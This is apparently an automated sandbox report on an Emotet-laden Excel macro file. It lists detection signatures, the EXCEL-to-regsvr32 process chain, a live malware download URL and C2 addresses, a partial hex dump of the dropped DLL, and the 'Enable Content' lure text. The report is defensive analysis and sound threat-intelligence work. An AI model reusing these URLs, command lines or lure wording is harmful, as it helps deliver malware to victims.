Edit tour

Windows Analysis Report
qd_34768.xlsm

Overview

General Information

Sample Name:	qd_34768.xlsm
Analysis ID:	601134
MD5:	07f30f1fa5420f050ea5929af0f95265
SHA1:	6310b51fca4003fb36252367f058c2e990ba5734
SHA256:	48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
Tags:	xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Multi AV Scanner detection for domain / URL

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Network Activity

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Regsvr32 Command Line Without DLL

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected MalDoc1

Queries the volume information (name, serial number etc) of a device

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sigma detected: Excel Network Connections

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Xls With Macro 4.0

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1528 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 468 cmdline: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 732 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sharedStrings.xml	JoeSecurity_MalDoc_1	Yara detected MalDoc_1	Joe Security
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
5.2.regsvr32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.250000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.250000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.230000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.400000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.400000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.3c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.3c0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1e0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.1e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, CommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1528, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, ProcessId: 468, ProcessName: regsvr32.exe

Sigma detected: Regsvr32 Network Activity

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 68.183.94.239, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 732, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: Regsvr32 Command Line Without DLL

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 468, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd", ProcessId: 2140, ProcessName: regsvr32.exe

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.46.40.47, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: qd_34768.xlsm

ReversingLabs: Detection: 40%

Antivirus detection for URL or domain

Source: http://eles-tech.com/css/KzMysMqFMs/	Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar	Avira URL Cloud: Label: malware
Source: https://68.183.94.239/	Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: eles-tech.com	Virustotal: Detection: 9%			Perma Link
Source: http://eles-tech.com/css/KzMysMqFMs/	Virustotal: Detection: 10%			Perma Link

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100492F7 FindFirstFileA,FindClose,	3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004168D2 FindFirstFileW,	5_2_004168D2

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: eVzUZ7dv5zBAXa5[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\xewn.dll			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

DNS query: name: eles-tech.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 68.183.94.239 80

Jump to behavior

Yara detected MalDoc1

Source: Yara match

File source: sharedStrings.xml, type: SAMPLE

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: TELLCOM-ASTR TELLCOM-ASTR

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Mar 2022 20:52:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Thu, 31 Mar 2022 20:52:02 GMTContent-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll"Content-Transfer-Encoding: binarySet-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/Last-Modified: Thu, 31 Mar 2022 20:52:02 GMTContent-Length: 868352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@

Source: global traffic

HTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: unknown	TCP traffic detected without corresponding DNS query: 68.183.94.239

Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://68.183.94.239/
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpg

Jump to behavior

Source: unknown

DNS traffic detected: queries for: eles-tech.com

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_00405D75 InternetReadFile,

5_2_00405D75

Source: global traffic

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003BD55 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	3_2_1003BD55
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10044296 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	3_2_10044296
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1004697A GetKeyState,GetKeyState,GetKeyState,GetKeyState,	3_2_1004697A

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4	Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Screenshot number: 8	Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ::
Source: Screenshot number: 8	Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: -Aj 19 20 21 22 23

Found malicious Excel 4.0 Macro

Source: qd_34768.xlsm	Macro extractor: Sheet: PIMKE contains: URLDownloadToFileA
Source: qd_34768.xlsm	Macro extractor: Sheet: PIMKE contains: URLDownloadToFileA

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\xewn.dll			Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: qd_34768.xlsm	Initial sample: EXEC
Source: qd_34768.xlsm	Initial sample: EXEC

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002D9F0	3_2_1002D9F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10027A87	3_2_10027A87
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10017A8D	3_2_10017A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10017C6A	3_2_10017C6A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100203BE	3_2_100203BE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10042F7D	3_2_10042F7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C25E7	3_2_003C25E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DE978	3_2_003DE978
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D8BA1	3_2_003D8BA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C8ED3	3_2_003C8ED3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CB1A1	3_2_003CB1A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D31D5	3_2_003D31D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D39B8	3_2_003D39B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D7A53	3_2_003D7A53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DFADC	3_2_003DFADC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C5AC9	3_2_003C5AC9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CDF44	3_2_003CDF44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C3F40	3_2_003C3F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DC064	3_2_003DC064
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C2050	3_2_003C2050
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D609A	3_2_003D609A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D815D	3_2_003D815D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CC14C	3_2_003CC14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DA1B1	3_2_003DA1B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C62BA	3_2_003C62BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DE2E1	3_2_003DE2E1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CC388	3_2_003CC388
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DA455	3_2_003DA455
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D44A7	3_2_003D44A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C4497	3_2_003C4497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CE4E2	3_2_003CE4E2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DE4E3	3_2_003DE4E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D0552	3_2_003D0552
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DC5E5	3_2_003DC5E5
